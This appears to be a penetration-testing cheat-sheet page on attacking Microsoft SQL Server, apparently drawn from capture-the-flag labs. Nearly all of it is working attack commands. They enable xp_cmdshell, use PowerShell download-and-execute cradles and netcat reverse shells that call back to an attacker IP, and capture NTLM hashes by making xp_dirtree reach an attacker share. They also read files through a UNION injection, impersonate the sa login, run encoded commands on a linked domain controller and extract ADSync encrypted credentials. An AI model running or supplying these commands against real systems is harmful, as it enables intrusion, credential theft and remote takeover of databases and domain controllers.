MSSQL

sqsh -S $IP -U sa -P <password>

> EXEC SP_CONFIGURE 'show advanced options',1;reconfigure
> EXEC SP_CONFIGURE 'xp_cmdshell',1;reconfigure

> xp_cmdshell "whoami"
> go

Reverse Shell with Powershell

> xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString('http://10.10.x.y/reverse.ps1')"
> go

Powershell use Nishang payload

Normally MSSQL associate with Service Principal Name (SPN) in AD.

checking the compromised computer:

powershell -exec bypass

# import module
. .\GetUserSPN.ps1

collect:

SAMAccountName
Service Principal Name

MSSQL Auth

Builtin\Users
sa (service account)

Do you have a valid creds?

mssqlclient.py manager/operator:operator@manager.htb -windows-auth

# myssqlclient.py <domain>/<user>:<pass>@<full domain> -windows-auth

Enumeration for PrivEsc

Do you have access to the machine with mssql?

sqlcmd -Q "select * from sys.databases"
sqlcmd -Q "select name,create_date from sys.databases"

Using PowerUpSQL

GitHub - NetSPI/PowerUpSQL: PowerUpSQL: A PowerShell Toolkit for Attacking SQL ServerGitHub

# download and import
PS> IEX(New-Object Net.WebClient).downloadString("http://<attacker ip>:<port>/PowerUpSQL.ps1")


Invoke-SQLAuit -Verbose

Capturing the NTLM Hash

Make sure you have access to command xp_dirtree in the sqlcmd.

# setup responder
sudo responder -I tun0

# call the attacker IP inside the sqlcmd

sqlcmd -Q "xp_dirtree '\\<attacker ip>\test'"

MSSQL Read File

Permissions: The BULK option requires the ADMINISTER BULK OPERATIONS or the ADMINISTER DATABASE BULK OPERATIONS permission.

-1 union select null,(select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)),null,null

RCE with MSSQL

EXEC xp_cmdshell "net user";
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
EXEC xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString('http://10.10.x.y/reverse.ps1')"


# reverse shell

#power.ps1
iwr http://10.10.16.2/nc.exe -outfile c:\windows\tasks\nc.exe;
c:\windows\tasks\nc.exe -e powershell.exe 10.10.16.2 12345

EXECUTE AS LOGIN = 'sa';
EXEC xp_cmdshell "powershell -ep bypass iex(iwr http://10.10.16.2/power.ps1 -usebasicp)";

# rlwrap nc -lvnp 12345

If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)

EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;

There is Azure AD and DCSync?

ref:

sqlcmd -Q "Use ADSync; select private_configurateion_xml,encrypted_configuration FROM mms_management_agent"


# download the code as decrypt.ps1 and make sure you change the Data Source.
IEX(New-Object Net.WebClient).downloadString('http://<attacker ip>:<port>/decrypt.ps1')

Check Ability to Impersonate User

SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'

EXECUTE AS LOGIN = 'sa';
EXEC sp_configure 'show advanced options',1; reconfigure;
EXEC sp_configure 'xp_cmdshell', 1; reconfigure;
EXEC xp_cmdshell 'powershell -c "C:\Windows\Tasks\nc.exe -e cmd 10.10.x.y 443"'

impersonate dbo (db owner)

use msdb; EXECUTE AS USER = 'dbo';

Check Linked Server with MSSQL

EXEC sp_linkedservers;
# if linked to DC you could query accoss from current sql server

SELECT version FROM OPENQUERY("DC01", 'SELECT @@VERSION AS version');
SELECT myuser FROM OPENQUERY("DC01", 'SELECT SYSTEM_USER AS myuser');

# execute the RCE at dc01
EXEC ('sp_configure ''show advanced options'',1; reconfigure;') AT dc01
EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT dc01
EXEC ('xp_cmdshell ''powershell -enc <base64 powershell>'' ') AT dc01

MSSQL query problem with quote, so using base64 encode command is best options.

reference:

PreviousMSRPC (135)NextKerberos (88/tcp)

Last updated 7 months ago

Login to MSSQL Server with SQSH